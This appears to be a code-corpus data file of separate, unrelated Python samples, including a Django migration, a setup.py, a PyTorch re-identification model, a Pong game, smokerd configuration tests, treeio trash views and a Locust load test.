    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in faces:
        framecount += 1
        cv2.imwrite(f'dataset/{folder}/{name}.{roll}.{framecount}.jpg', frame)
        print('frame no', framecount, ' captured!')
        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
        cv2.waitKey(100)
    cv2.imshow('img', frame)
    cv2.waitKey(1)
    if framecount > 200:
        break

capture.release()
cv2.destroyAllWindows()
|
StarcoderdataPython
|
5148496
|
<reponame>tkanemoto/django-portfolios<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-12 13:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portfolios', '0035_auto_20170812_1230'),
]
operations = [
migrations.AddField(
model_name='page',
name='address',
field=models.TextField(blank=True, help_text='Postal address', max_length=300, null=True),
),
migrations.AddField(
model_name='page',
name='phone',
field=models.CharField(blank=True, help_text='The contact phone number', max_length=20, null=True),
),
migrations.AlterField(
model_name='socialmedialink',
name='kind',
field=models.CharField(choices=[('facebook', 'Facebook'), ('linkedin', 'LinkedIn'), ('twitter', 'Twitter'), ('soundcloud', 'SoundCloud'), ('spotify', 'Spotify'), ('youtube', 'YouTube'), ('github', 'GitHub')], max_length=20, verbose_name='kind'),
),
]
|
StarcoderdataPython
|
3435903
|
<gh_stars>0
"""
Babelscan examples
Fit multiple peaks in single scan
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import babelscan
scan = babelscan.file_loader(r"C:\Users\dgpor\Dropbox\Python\ExamplePeaks\794940.nxs")
scan.set_error_operation()
print(scan)
res = scan.fit.multi_peak_fit(print_result=True, plot_result=True)
plt.show()
print('Finished')
|
StarcoderdataPython
|
6485599
|
<filename>setup.py
import fnmatch
from setuptools import find_packages, setup
from setuptools.command.build_py import build_py as build_py_orig
excluded = [
'.git*',
'.vscode',
'*workspace',
]
class build_py(build_py_orig):
def find_package_modules(self, package, package_dir):
modules = super().find_package_modules(package, package_dir)
return [
(pkg, mod, file)
for (pkg, mod, file) in modules
if not any(fnmatch.fnmatchcase(file, pat=pattern) for pattern in excluded)
]
setup(name='Workforce_PY',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
'Programming Language :: Python :: 3.8',
'Topic :: Office/Business :: Scheduling',
'Topic :: Software Development :: Libraries',
],
python_requires='>=3.8',
version='0.1',
author='<NAME>',
author_email='<EMAIL>',
description='A Library for Workforce planning in contact centers.',
long_description_content_type="text/markdown",
url='https://github.com/kpg141260/erlang',
      packages=find_packages(),
long_description=open('README.md').read(),
cmdclass={'build_py': build_py},
zip_safe=True
)
|
StarcoderdataPython
|
6604870
|
# ========================== begin_copyright_notice ============================
#
# Copyright (C) 2020-2021 Intel Corporation
#
# SPDX-License-Identifier: MIT
#
# =========================== end_copyright_notice =============================
# -*- Python -*-
import os
import lit.formats
import lit.util
from lit.llvm import llvm_config
from lit.llvm.subst import ToolSubst
from lit.llvm.subst import FindTool
# Configuration file for the 'lit' test runner.
# name: The name of this test suite.
config.name = 'vc-intrinsics'
# testFormat: The test format to use to interpret tests.
config.test_format = lit.formats.ShTest(not llvm_config.use_lit_shell)
# suffixes: A list of file extensions to treat as test files.
config.suffixes = ['.ll']
# excludes: A list of directories and files to exclude from the testsuite.
config.excludes = ['CMakeLists.txt', 'Plugin']
used_llvm = "llvm{}".format(config.llvm_version_major)
config.available_features = [used_llvm]
# test_source_root: The root path where tests are located.
config.test_source_root = os.path.dirname(__file__)
# test_exec_root: The root path where tests should be run.
config.test_exec_root = os.path.join(config.test_run_dir, 'test_output')
llvm_config.use_default_substitutions()
config.substitutions.append(('%PATH%', config.environment['PATH']))
tool_dirs = [config.llvm_tools_dir]
# Add extra args for opt to remove boilerplate from tests.
opt_extra_args = ['-load', config.vc_intrinsics_plugin]
# Add an option for new pass manager plugins. Extension instead of
# replacement is needed to work around the option parsing mechanism. The
# argument of '-load' is processed during initial option parsing, and all
# passes from the plugin are registered in the legacy PM. This registration
# allows passes to be added to the new PM via command line options in the
# same way as with the old PM. Otherwise, -passes=<pass> would be used for
# the new PM and -<pass> for the old PM. Additionally, LLVM loads the plugin
# only once because it permanently loads libraries with caching behavior.
if int(config.llvm_version_major) >= 13:
opt_extra_args.extend(['-load-pass-plugin', config.vc_intrinsics_plugin])
tools = [ToolSubst('opt', extra_args=opt_extra_args)]
llvm_config.add_tool_substitutions(tools, tool_dirs)
|
StarcoderdataPython
|
3555222
|
<filename>simax/tasks/none_task.py<gh_stars>0
from simax.tasks.base_task import BaseTask
class NoneTask(BaseTask):
def cycle(self):
return None
|
StarcoderdataPython
|
6410939
|
import sys
def reducer():
# previous key
old_user = None
# final row structure of data set
row = {
'user_id': None,
'id': None,
'title': None,
'tagnames': None,
'node_type': None,
'parent_id': None,
'abs_parent_id': None,
'added_at': None,
'score': None,
'reputation': None,
'gold': None,
'silver': None,
'bronze': None,
}
for line in sys.stdin:
data = line.split('\t')
# the line with user data will come first
# due to shuffle sort
if len(data) == 5:
row['user_id'] = data[0]
row['reputation'] = data[1]
row['gold'] = data[2]
row['silver'] = data[3]
row['bronze'] = data[4]
continue
elif len(data) == 9:
# fill data from forum post
i = 0
for key in row:
if i >= 9:
break
row[key] = data[i]
i += 1
print(row)
# new user ?
# if old_user is not None and old_user != row['user_id']:
# print(row)
# # do not clear row as next line with
# # let it be overwritten by the next line
# # row = dict({key: None for key in row})
#
# old_user = row['user_id']
#
# if old_user is not None:
# print(row)
if __name__ == '__main__':
reducer()
|
StarcoderdataPython
|
8036195
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: <EMAIL>
"""
import math
import torch
from torch import nn
from torch.nn import init  # used by the weight-init helpers below but missing from the original imports
from models.models_utils.rga_modules import RGA_Module
from models.models_utils.part_rga_modules import Part_RGA_Module
def weights_init_kaiming(m):
classname = m.__class__.__name__
if classname.find('Conv2d') != -1:
init.kaiming_normal_(m.weight.data, mode='fan_out', nonlinearity='relu')
elif classname.find('Linear') != -1:
init.kaiming_normal(m.weight.data, a=0, mode='fan_out')
init.constant(m.bias.data, 0.0)
elif classname.find('BatchNorm1d') != -1:
init.normal(m.weight.data, 1.0, 0.02)
init.constant(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
init.constant(m.weight.data, 1)
init.constant(m.bias.data, 0)
def weights_init_classifier(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
init.normal(m.weight.data, std=0.001)
init.constant(m.bias.data, 0.0)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class ClassBlock(nn.Module):
def __init__(self, input_dim, class_num, relu=True, num_bottleneck=512):
super(ClassBlock, self).__init__()
add_block = []
add_block += [nn.Conv2d(input_dim, num_bottleneck, kernel_size=1, bias=False)]
add_block += [nn.BatchNorm2d(num_bottleneck)]
if relu:
#add_block += [nn.LeakyReLU(0.1)]
add_block += [nn.ReLU(inplace=True)]
add_block = nn.Sequential(*add_block)
add_block.apply(weights_init_kaiming)
classifier = []
classifier += [nn.Linear(num_bottleneck, class_num)]
classifier = nn.Sequential(*classifier)
classifier.apply(weights_init_classifier)
self.add_block = add_block
self.classifier = classifier
def forward(self, x):
x = self.add_block(x)
x = torch.squeeze(x)
x = self.classifier(x)
return x
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Relation_with_region(nn.Module):
def __init__(self, class_num,last_stride=1, block=Bottleneck, layers=[3, 4, 6, 3],
spa_on=True, cha_on=True, s_ratio=8, c_ratio=8, d_ratio=8, height=256, width=128,):
self.inplanes = 64
super().__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)  # re-enabled: forward() below calls self.relu
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
self.rga_att1 = RGA_Module(256, (height // 4) * (width // 4), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att2 = RGA_Module(512, (height // 8) * (width // 8), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att3 = RGA_Module(1024, (height // 16) * (width // 16), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.rga_att4 = RGA_Module(2048, (height // 16) * (width // 16), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=s_ratio, down_ratio=d_ratio)
self.region_att = Part_RGA_Module(2048, (6) * (1), use_spatial=spa_on, use_channel=cha_on,
cha_ratio=c_ratio, spa_ratio=1, down_ratio=d_ratio)
        # self.part is assumed to be 6, matching the 6x1 region attention above
        self.part = 6
        self.classifiers = nn.ModuleList()
        for i in range(self.part):
            self.classifiers.append(ClassBlock(2048, class_num, True, 256))
        # collect the per-part feature extractors and classifier heads (both
        # were referenced but never initialised in the original code)
        self.feature = []
        self.cls = []
        for i in range(self.part):
            self.feature.append(self.classifiers[i].add_block)
            self.cls.append(self.classifiers[i].classifier)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
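        # The 1x1 conv + BN projection above resizes the identity branch so
        # the residual addition in the block's forward() stays shape-compatible
        # whenever the stride or channel count changes.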
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.rga_att1(x)
x = self.layer2(x)
x = self.rga_att2(x)
x = self.layer3(x)
x = self.rga_att3(x)
x = self.layer4(x)
partfeature=self.region_att(x)
part = {}
predict = {}
feature = {}
f = []
# get six part feature batchsize*2048*6
for i in range(self.part):
part[i] = partfeature[:, :, i, :]
part[i] = torch.unsqueeze(part[i], 3)
# print part[i].shape
feature[i] = self.feature[i](part[i])
# print(feature[i].size())
f.append(feature[i])
# predict[i] = self.cls[i](feature[i])
predict[i] = self.classifiers[i](part[i])
# for i in range(self.part):
x = torch.cat(f, 2)
feat = x.view(x.size(0), x.size(1), x.size(2))
cls = []
for i in range(self.part):
cls.append(predict[i])
# return cls, feat
x = self.rga_att4(x)
return x,feat,cls
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
|
StarcoderdataPython
|
6494765
|
import pandas as pd
def read_file(data_file):
d_file = pd.read_csv(data_file, low_memory=False,
usecols=['ACC-X-Ring1', 'ACC-Y-Ring1', 'ACC-Z-Ring1', 'GYRO-X-Ring1', 'GYRO-Y-Ring1',
'GYRO-Z-Ring1', 'ACC-X-Ring2', 'ACC-Y-Ring2', 'ACC-Z-Ring2', 'GYRO-X-Ring2',
'GYRO-Y-Ring2', 'GYRO-Z-Ring2', 'ACC-X-Ring3', 'ACC-Y-Ring3', 'ACC-Z-Ring3',
'GYRO-X-Ring3', 'GYRO-Y-Ring3', 'GYRO-Z-Ring3', 'TEST'])
return pd.DataFrame(d_file.dropna())
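
# Illustrative usage (hypothetical file name; any CSV containing the listed
# ring accelerometer/gyroscope columns would do):
#
#     df = read_file('ring_sensors.csv')
#     print(df.shape)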
|
StarcoderdataPython
|
6454023
|
import urllib.request
from bs4 import BeautifulSoup

def cricbuzz():
    url = "http://www.cricbuzz.com/cricket-series/2330/indian-premier-league-2015"
    print("Getting updates from Cricbuzz . . . . . . . . .")
    page = urllib.request.urlopen(url)
    soup = BeautifulSoup(page.read(), 'html.parser')
    headlines = soup.find_all('h3', {'class': 'cb-headline'})
    for headline in headlines:
        print(headline.string)

if __name__ == "__main__":
    cricbuzz()
|
StarcoderdataPython
|
8124900
|
from Python_lxf.awesomepython3webapp.www import orm
from Python_lxf.awesomepython3webapp.www.models import User, Blog, Comment
import asyncio
async def test(loop):
await orm.create_pool(loop, host='127.0.0.1', port=3306,
user='www-data', password='<PASSWORD>', db='awesome')
u = User(name='Test', email='<EMAIL>', passwd='<PASSWORD>', image='about:blank', id='000')
await u.save()
async def find(loop):
await orm.create_pool(loop, user='www-data', password='<PASSWORD>', db='awesome')
rs = await User.findAll()
print('find test: %s' % rs)
loop = asyncio.get_event_loop()
loop.run_until_complete(find(loop))
loop.run_forever()
|
StarcoderdataPython
|
8089701
|
<gh_stars>1-10
'''
Factory to produce messages
'''
def get_send_header():
'''
==============
獲鴨自動腥野系統
==============
'''
return "================\r\n\u7372\u9D28\u81EA\u52D5\u8165\u91CE\u7CFB\u7D71\r\n================\n"
def get_body(*messages):
result = "\u8FC5\u8272\u8010\u6D74:\r\n----------------\n" #迅色耐浴\n----------------
if len(messages) == 0:
return result + " \u7121\u54A9\u7279\u5225\u5206\u4EAB\n" # 無咩特別分享
body_part = ""
for position, message in enumerate(messages):
body_part += str(position) + ".) "
body_part += (message + "\n")
return result + body_part
def get_footer():
return "================\n\u8DCC\u5C4E\u92EA\u9B3C\u672A\u6557\u8F4E\u6953\n================"
def construct_default_message():
return get_send_header() + get_body() + get_footer()
def construct_message(*messages):
return construct_default_message() if len(messages) == 0 else get_send_header() + get_body(*messages) + get_footer()
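
# Illustrative usage (not part of the original module):
#
#     print(construct_message())           # header + "nothing to share" body + footer
#     print(construct_message("msg one"))  # header + numbered body + footer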
|
StarcoderdataPython
|
294469
|
class Solution:
def XXX(self, root: TreeNode) -> int:
self.maxleftlength = 0
self.maxrightlength = 0
return self.dp(root)
def dp(self,root):
if(root is None):
return 0
self.maxleftlength = self.dp(root.left)
self.maxrightlength = self.dp(root.right)
return max(self.maxleftlength,self.maxrightlength)+1
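
# Note: despite the obfuscated name, XXX computes the maximum depth (height)
# of a binary tree: each call returns 1 + the deeper of the two subtrees,
# with an empty subtree contributing 0.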
|
StarcoderdataPython
|
3268970
|
<reponame>15379180/pipelines<filename>components/aws/sagemaker/run_tests.py
# Configures and runs the unit tests for all the components
import os
import sys
import unittest
# Taken from http://stackoverflow.com/a/17004263/2931197
def load_and_run_tests():
setup_file = sys.modules['__main__'].__file__
setup_dir = os.path.abspath(os.path.dirname(setup_file))
test_loader = unittest.defaultTestLoader
test_runner = unittest.TextTestRunner()
test_suite = test_loader.discover(setup_dir, pattern="test_*.py")
test_runner.run(test_suite)
if __name__ == '__main__':
load_and_run_tests()
|
StarcoderdataPython
|
176559
|
<gh_stars>1-10
#!/usr/bin/env python
import sys
if sys.version_info[0] >= 3:
import PySimpleGUI as sg
else:
import PySimpleGUI27 as sg
import random
import time
from sys import exit as exit
"""
Pong code supplied by <NAME> (Neonzz)
Modified. Original code: https://www.pygame.org/project/3649/5739
"""
class Ball:
def __init__(self, canvas, bat, bat2, color):
self.canvas = canvas
self.bat = bat
self.bat2 = bat2
self.playerScore = 0
self.player1Score = 0
self.drawP1 = None
self.drawP = None
self.id = self.canvas.create_oval(10, 10, 35, 35, fill=color)
self.canvas.move(self.id, 327, 220)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.x = random.choice([-2.5, 2.5])
if self.x >= 0:
self.starter = 'right'
if self.x < 0:
self.starter = 'left'
self.y = -2.5
def checkwin(self):
winner = None
if self.playerScore >= 1:
winner = 'Player Left wins '
if self.player1Score >= 1:
winner = 'Player Right wins '
return winner
def checkStarter(self): ###################################################
start = None
if self.starter == 'right':
start = "Right "
if self.starter == 'left':
start = "Left "
return start
def updatep(self, val):
self.canvas.delete(self.drawP)
self.drawP = self.canvas.create_text(170, 50, font=('freesansbold.ttf', 40), text=str(val), fill='white')
def updatep1(self, val):
self.canvas.delete(self.drawP1)
self.drawP1 = self.canvas.create_text(550, 50, font=('freesansbold.ttf', 40), text=str(val), fill='white')
def hit_bat(self, pos):
bat_pos = self.canvas.coords(self.bat.id)
if pos[2] >= bat_pos[0] and pos[0] <= bat_pos[2]:
if pos[3] >= bat_pos[1] and pos[3] <= bat_pos[3]:
return True
return False
def hit_bat2(self, pos):
bat_pos = self.canvas.coords(self.bat2.id)
if pos[2] >= bat_pos[0] and pos[0] <= bat_pos[2]:
if pos[3] >= bat_pos[1] and pos[3] <= bat_pos[3]:
return True
return False
def draw(self):
self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 4
if pos[3] >= self.canvas_height:
self.y = -4
if pos[0] <= 0:
self.player1Score += 1
self.canvas.move(self.id, 327, 220)
self.x = 4
self.updatep1(self.player1Score)
if pos[2] >= self.canvas_width:
self.playerScore += 1
self.canvas.move(self.id, -327, -220)
self.x = -4
self.updatep(self.playerScore)
if self.hit_bat(pos):
self.x = 4
if self.hit_bat2(pos):
self.x = -4
class pongbat():
def __init__(self, canvas, color):
self.canvas = canvas
self.id = self.canvas.create_rectangle(40, 200, 25, 310, fill=color)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.y = 0
def up(self, evt):
self.y = -5
def down(self, evt):
self.y = 5
def draw(self):
self.canvas.move(self.id, 0, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 0
if pos[3] >= 400:
self.y = 0
class pongbat2():
def __init__(self, canvas, color):
self.canvas = canvas
self.id = self.canvas.create_rectangle(680, 200, 660, 310, fill=color)
self.canvas_height = self.canvas.winfo_height()
self.canvas_width = self.canvas.winfo_width()
self.y = 0
def up(self, evt):
self.y = -5
def down(self, evt):
self.y = 5
def draw(self):
self.canvas.move(self.id, 0, self.y)
pos = self.canvas.coords(self.id)
if pos[1] <= 0:
self.y = 0
if pos[3] >= 400:
self.y = 0
def pong():
# ------------- Define GUI layout -------------
layout = [[sg.Canvas(size=(700, 400), background_color='black', key='canvas')],
[sg.T(''), sg.Button('Quit')]]
# ------------- Create window -------------
window = sg.Window('The Classic Game of Pong', return_keyboard_events=True).Layout(layout).Finalize()
# window.Finalize() # TODO Replace with call to window.Finalize once code released
# ------------- Get the tkinter Canvas we're drawing on -------------
canvas = window.FindElement('canvas').TKCanvas
# ------------- Create line down center, the bats and ball -------------
canvas.create_line(350, 0, 350, 400, fill='white')
bat1 = pongbat(canvas, 'white')
bat2 = pongbat2(canvas, 'white')
ball1 = Ball(canvas, bat1, bat2, 'green')
# ------------- Event Loop -------------
while True:
# ------------- Draw ball and bats -------------
ball1.draw()
bat1.draw()
bat2.draw()
# ------------- Read the form, get keypresses -------------
event, values = window.Read(timeout=0)
# ------------- If quit -------------
if event is None or event == 'Quit':
exit()
# ------------- Keypresses -------------
if event is not None:
if event.startswith('Up'):
bat2.up(1)
elif event.startswith('Down'):
bat2.down(1)
elif event == 'w':
bat1.up(2)
elif event == 's':
bat1.down(2)
if ball1.checkwin():
sg.Popup('Game Over', ball1.checkwin(), ball1.checkStarter() + ' started with the ball')
break
# ------------- Bottom of loop, delay between animations -------------
# time.sleep(.01)
canvas.after(10)
if __name__ == '__main__':
pong()
|
StarcoderdataPython
|
3551972
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2015, GoodData(R) Corporation. All rights reserved
import copy
import datetime
import os
import pytest
from smoker.server.daemon import Smokerd
def generate_unique_file():
return datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f')
class TestDaemon(object):
"""Unit tests for the load_config functions"""
conf_dir = (os.path.dirname(os.path.realpath(__file__)) +
'/smoker_test_resources/smokerd')
expected_basic = {
'bind_host': '0.0.0.0',
'bind_port': 8086,
'pidfile': '/var/run/smokerd.pid',
'stdin': '/dev/null',
'stdout': '/dev/null',
'stderr': '/dev/null',
'templates': {
'BasePlugin': {
'Timeout': 5,
'History': 10
}
}
}
expected_plugins = {
'plugins': {
'uname': {
'Category': 'system',
'Interval': 1,
'Module': 'smoker.server.plugins.uname'
},
'hostname': {
'Category': 'system',
'Interval': 1,
'Command': 'hostname'
},
'uptime': {
'Category': 'monitoring',
'Interval': 1,
'Command': 'uptime'
}
}
}
def test_load_config(self):
yaml_file = self.conf_dir + '/smokerd.yaml'
expected_plugins = copy.deepcopy(self.expected_plugins)
expected = dict(expected_plugins, **copy.deepcopy(self.expected_basic))
expected['config'] = yaml_file
smokerd = Smokerd(config=yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
conf_smokerd = open(self.conf_dir + '/smokerd_basic.yaml', 'r').read()
expected_plugins = copy.deepcopy(self.expected_plugins)
expected = dict(expected_plugins, **copy.deepcopy(self.expected_basic))
expected['config'] = yaml_file
conf_plugins = [
'plugins:',
' hostname: !include %s/plugins/hostname.yaml' % self.conf_dir,
' uptime: !include %s/plugins/uptime.yaml' % self.conf_dir,
' uname: !include %s/plugins/uname.yaml' % self.conf_dir
]
conf_smokerd += '\n'.join(conf_plugins)
with open(yaml_file, 'wb') as fp:
fp.write(conf_smokerd)
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_dir(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
expected['bind_host'] = '0.0.0.0'
expected['bind_port'] = 8086
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir %s/plugins\n' % self.conf_dir)
fp.write('bind_host: 0.0.0.0\n')
fp.write('bind_port: 8086\n')
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_files(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
conf_plugins = [
'plugins:',
' hostname: !include %s/plugins/hostname.yaml' % self.conf_dir,
' uptime: !include %s/plugins/uptime.yaml' % self.conf_dir,
' uname: !include %s/plugins/uname.yaml' % self.conf_dir
]
with open(yaml_file, 'wb') as fp:
fp.write('\n'.join(conf_plugins))
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_include_dir_only(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
expected = copy.deepcopy(self.expected_plugins)
expected['config'] = yaml_file
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir %s/plugins' % self.conf_dir)
smokerd = Smokerd(config=yaml_file)
os.remove(yaml_file)
assert smokerd.conf == expected
def test_load_config_with_invalid_file_path(self):
expected = 'No such file or directory'
with pytest.raises(IOError) as exc_info:
Smokerd(config='InvalidFilePath')
assert expected in exc_info.value
def test_load_config_with_invalid_include_file_path(self):
expected = 'No such file or directory'
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include /InvalidFilePath')
with pytest.raises(IOError) as exc_info:
Smokerd(config=yaml_file)
assert expected in exc_info.value
os.remove(yaml_file)
def test_load_config_with_invalid_include_dir_path(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins: !include_dir /InvalidFilePath')
smokerd = Smokerd(config=yaml_file)
assert 'plugins' in smokerd.conf
assert not smokerd.conf['plugins']
os.remove(yaml_file)
def test_load_config_with_invalid_yaml_format(self):
yaml_file = '%s/%s.yaml' % (self.conf_dir, generate_unique_file())
with open(yaml_file, 'wb') as fp:
fp.write('plugins InvalidFormat')
with pytest.raises(AttributeError) as exc_info:
Smokerd(config=yaml_file)
assert "'str' object has no attribute 'iteritems'" in exc_info.value
os.remove(yaml_file)
with open(yaml_file, 'wb') as fp:
fp.write('- plugins InvalidFormat')
with pytest.raises(AttributeError) as exc_info:
Smokerd(config=yaml_file)
assert "'list' object has no attribute 'iteritems'" in exc_info.value
os.remove(yaml_file)
def test_load_config_from_default_path(self):
        # No good way to test this case:
        # the default smoker.yaml differs across nodes
pass
|
StarcoderdataPython
|
6499528
|
<gh_stars>1-10
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Core module: Trash views
"""
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.core.urlresolvers import reverse
from treeio.core.models import Object
from treeio.core.decorators import treeio_login_required, handle_response_format
from treeio.core.rendering import render_to_response
from treeio.core.views import user_denied
from treeio.core.trash.forms import MassActionForm
def _process_mass_form(f):
"Pre-process request to handle mass action form for Tasks and Milestones"
def wrap(request, *args, **kwargs):
"Wrap"
if 'massform' in request.POST:
if 'delete_all' in request.POST.values():
try:
object = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False)
form = MassActionForm(request.POST, instance=object)
if form.is_valid() and request.user.get_profile().has_permission(object, mode='w'):
form.save()
except Exception, e:
pass
else:
for key in request.POST:
if 'mass-object' in key:
try:
object = Object.objects.get(pk=request.POST[key])
form = MassActionForm(request.POST, instance=object)
if form.is_valid() and request.user.get_profile().has_permission(object, mode='w'):
form.save()
except Exception, e:
pass
return f(request, *args, **kwargs)
wrap.__doc__ = f.__doc__
wrap.__name__ = f.__name__
return wrap
@treeio_login_required
@handle_response_format
@_process_mass_form
def index(request, response_format='html'):
"List of items in Trash"
trash = Object.filter_by_request(request, manager=Object.objects.filter(trash=True),
mode='r', filter_trash=False)
massform = MassActionForm()
return render_to_response('core/trash/index',
{'trash': trash,
'massform': massform},
context_instance=RequestContext(request), response_format=response_format)
@treeio_login_required
@handle_response_format
def object_delete(request, object_id, response_format='html'):
"Completely delete item"
object = get_object_or_404(Object, pk=object_id)
if not request.user.get_profile().has_permission(object, mode='w'):
return user_denied(request, message="You don't have access to this Object")
if request.POST:
if 'delete' in request.POST:
object.delete()
return HttpResponseRedirect(reverse('core_trash'))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse('core_trash'))
return render_to_response('core/trash/object_delete',
{'object': object},
context_instance=RequestContext(request), response_format=response_format)
@treeio_login_required
@handle_response_format
def object_untrash(request, object_id, response_format='html'):
"Untrash item"
object = get_object_or_404(Object, pk=object_id)
if not request.user.get_profile().has_permission(object, mode='w'):
return user_denied(request, message="You don't have access to this Object")
related = object.get_related_object()
if related:
related.trash = False
related.save()
else:
object.trash = False
object.save()
return HttpResponseRedirect(reverse('core_trash'))
|
StarcoderdataPython
|
11326107
|
<gh_stars>0
from pathlib import Path
import os
import random
from locust import HttpUser, task, between
import logging
def get_project_root() -> str:
return str(Path(__file__).parent.parent)
def read_file(file_path):
with open(file_path, 'r', encoding='utf-8') as f:
content = [line.strip() for line in f.readlines() if line.strip()]
return content
class User(HttpUser):
wait_time = between(1, 2)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ROOT = get_project_root()
PATH = os.path.join(ROOT, 'data/conll14st-test-data/noalt/official-2014.combined_incorr.txt')
self.data = read_file(PATH)
@task
def correct(self):
text = random.choice(self.data)
with self.client.post('', json={"text": text}) as response:
if response.status_code != 200:
logging.info(
'{} raised during handling following text:\n{}'.format(str(response.raise_for_status()), text))
|
StarcoderdataPython
|
3456067
|
from models import *
import logging
import hashlib
import settings
import traceback
import sys
import os
import string
import uuid
import email  # needed by handle_legacy_blob below; missing from the original imports
